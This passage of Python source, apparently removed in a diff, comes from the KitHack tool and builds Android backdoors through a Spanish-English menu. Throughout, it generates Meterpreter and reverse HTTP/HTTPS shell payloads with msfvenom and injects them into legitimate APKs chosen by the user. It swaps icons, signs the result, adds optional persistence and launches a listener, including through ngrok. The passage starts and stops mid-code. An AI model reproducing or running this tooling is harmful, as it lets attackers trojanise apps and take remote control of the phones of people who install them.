os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/meterpreter/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("{}\n[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif pay == '05': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_http LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_http LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("{}\n[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif pay == '06': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_https LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: 